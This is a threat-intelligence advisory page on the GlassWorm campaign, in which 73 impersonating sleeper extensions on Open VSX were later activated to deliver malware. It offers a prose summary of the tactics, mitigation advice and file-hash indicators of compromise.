73 Open VSX Sleeper Extensions Linked to Malware Show New Activations
The GlassWorm campaign targeting Open VSX has escalated with 73 newly identified impersonation extensions. These sleeper extensions were initially published without malicious payloads by newly created GitHub accounts, appearing benign to build trust and credibility. At least six extensions have been activated to deliver malware through normal update mechanisms. The extensions clone popular legitimate listings with similar branding, icons, and descriptions, making detection difficult. The threat actor has shifted delivery methods away from embedded loaders toward transitive delivery via extension dependencies, external payload retrieval from GitHub-hosted VSIX files, and native binary execution. Some variants use obfuscated JavaScript to decode and retrieve payloads at runtime. The malicious code targets multiple IDEs including VS Code, Cursor, Windsurf, and VSCodium, installing downloaded extensions through command-line interfaces.
AI Analysis
Technical Summary
This campaign involves 73 newly identified malicious extensions on the Open VSX marketplace that impersonate popular legitimate extensions by cloning branding, icons, and descriptions. Initially benign to build credibility, some extensions have been activated to deliver malware through standard update processes. The attacker shifted from embedded loaders to transitive delivery via extension dependencies and external payload retrieval hosted on GitHub. The malware targets multiple IDEs, leveraging obfuscated JavaScript and native binary execution to install additional malicious extensions through command-line interfaces.
Potential Impact
The campaign enables attackers to compromise developer environments by delivering malware through trusted extension updates on Open VSX. This can lead to unauthorized code execution within popular IDEs, potentially compromising development workflows and systems. The impersonation and obfuscation techniques make detection difficult, increasing the risk of prolonged undetected presence and further payload delivery.
Mitigation Recommendations
No official patch or fix is currently available for this threat. Users should exercise caution when installing or updating extensions from Open VSX, especially those recently published or from new GitHub accounts. Verify extension authenticity through multiple sources before installation. Monitor for unusual extension behavior and consider restricting extension installations to trusted sources. Since this is a supply chain attack vector, organizations should review their extension management policies and consider additional controls to prevent unauthorized extension installations.
Indicators of Compromise
- hash: 4ebfe8f66ca7e9751060b3301b5e8838d6017593cdae748541de83bfa28183bd
- hash: 28d59940483fa3bea0599ce55aa86245
- hash: c074880abdbf87a9fd2e1393d4cb36c32f1f8f58
- hash: 1b62b7c2ed7cc296ce821f977ef7b22bae59ef1dcdb9a34ae19467ee39bcf168
- hash: 97c275e3406ad6576529f41604ad138c5bdc4297d195bf61b049e14f6b30adfd
73 Open VSX Sleeper Extensions Linked to Malware Show New Activations
Description
The GlassWorm campaign targeting Open VSX has escalated with 73 newly identified impersonation extensions. These sleeper extensions were initially published without malicious payloads by newly created GitHub accounts, appearing benign to build trust and credibility. At least six extensions have been activated to deliver malware through normal update mechanisms. The extensions clone popular legitimate listings with similar branding, icons, and descriptions, making detection difficult. The threat actor has shifted delivery methods away from embedded loaders toward transitive delivery via extension dependencies, external payload retrieval from GitHub-hosted VSIX files, and native binary execution. Some variants use obfuscated JavaScript to decode and retrieve payloads at runtime. The malicious code targets multiple IDEs including VS Code, Cursor, Windsurf, and VSCodium, installing downloaded extensions through command-line interfaces.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This campaign involves 73 newly identified malicious extensions on the Open VSX marketplace that impersonate popular legitimate extensions by cloning branding, icons, and descriptions. Initially benign to build credibility, some extensions have been activated to deliver malware through standard update processes. The attacker shifted from embedded loaders to transitive delivery via extension dependencies and external payload retrieval hosted on GitHub. The malware targets multiple IDEs, leveraging obfuscated JavaScript and native binary execution to install additional malicious extensions through command-line interfaces.
Potential Impact
The campaign enables attackers to compromise developer environments by delivering malware through trusted extension updates on Open VSX. This can lead to unauthorized code execution within popular IDEs, potentially compromising development workflows and systems. The impersonation and obfuscation techniques make detection difficult, increasing the risk of prolonged undetected presence and further payload delivery.
Mitigation Recommendations
No official patch or fix is currently available for this threat. Users should exercise caution when installing or updating extensions from Open VSX, especially those recently published or from new GitHub accounts. Verify extension authenticity through multiple sources before installation. Monitor for unusual extension behavior and consider restricting extension installations to trusted sources. Since this is a supply chain attack vector, organizations should review their extension management policies and consider additional controls to prevent unauthorized extension installations.
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://socket.dev/blog/73-open-vsx-sleeper-extensions-glassworm"]
- Adversary
- GlassWorm
- Pulse Id
- 69ef8c5eed11e8689f663f34
- Threat Score
- null
Indicators of Compromise
Hash
| Value | Description | Copy |
|---|---|---|
hash4ebfe8f66ca7e9751060b3301b5e8838d6017593cdae748541de83bfa28183bd | — | |
hash28d59940483fa3bea0599ce55aa86245 | — | |
hashc074880abdbf87a9fd2e1393d4cb36c32f1f8f58 | — | |
hash1b62b7c2ed7cc296ce821f977ef7b22bae59ef1dcdb9a34ae19467ee39bcf168 | — | |
hash97c275e3406ad6576529f41604ad138c5bdc4297d195bf61b049e14f6b30adfd | — |
Threat ID: 69ef8f0dba26a39fba414088
Added to database: 4/27/2026, 4:30:05 PM
Last enriched: 4/27/2026, 4:45:17 PM
Last updated: 4/28/2026, 1:47:35 AM
Views: 44
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.